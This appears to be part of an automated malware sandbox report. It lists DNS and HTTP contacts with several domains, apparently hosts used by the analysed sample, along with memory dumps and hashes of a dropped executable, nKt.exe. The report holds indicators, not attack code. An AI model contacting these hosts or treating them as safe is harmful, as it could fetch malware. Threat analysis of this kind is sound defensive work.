| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.141.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thienuyscit.com | udp |
| US | 8.8.8.8:53 | fashionandhomestyle.com | udp |
| US | 160.153.0.79:80 | fashionandhomestyle.com | tcp |
| US | 8.8.8.8:53 | 79.0.153.160.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bnsgroupbd.com | udp |
| US | 173.236.95.18:80 | bnsgroupbd.com | tcp |
| US | 8.8.8.8:53 | icart.lk | udp |
| US | 8.8.8.8:53 | osadchy.co.il | udp |
| US | 8.8.8.8:53 | 18.95.236.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.180.10:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 10.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
Files
memory/4972-1-0x00007FF8C1AAD000-0x00007FF8C1AAE000-memory.dmp
memory/4972-2-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-3-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-0-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-7-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-6-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-8-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-5-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-4-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-9-0x00007FF87F9A0000-0x00007FF87F9B0000-memory.dmp
memory/4972-10-0x00007FF87F9A0000-0x00007FF87F9B0000-memory.dmp
memory/4972-19-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-20-0x00007FF8C1AAD000-0x00007FF8C1AAE000-memory.dmp
memory/4972-21-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-25-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-28-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-41-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-42-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-43-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-44-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4476-45-0x000001C5A3310000-0x000001C5A3332000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5dlw1khu.2ba.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\nKt.exe
| MD5 | daf667dff839d90be2889f60640ef444 |
| SHA1 | ea159d10aa7aaa6e6e41b952d245a2c29fe33b8e |
| SHA256 | 746957e736d8e6772177756c4ffd8c12b088545398f762582e6b741025f0ccdd |
| SHA512 | 439441ee7407c5163016190251deb6f72b50d59267821c9f4d7c2f7e32b78fc47594efff7aa68c996fe1666b276afd89918605ca255f9eaa16f89c0918c5dce0 |
memory/4972-68-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-70-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-71-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-72-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-73-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/4972-92-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-93-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-95-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-94-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/4972-96-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp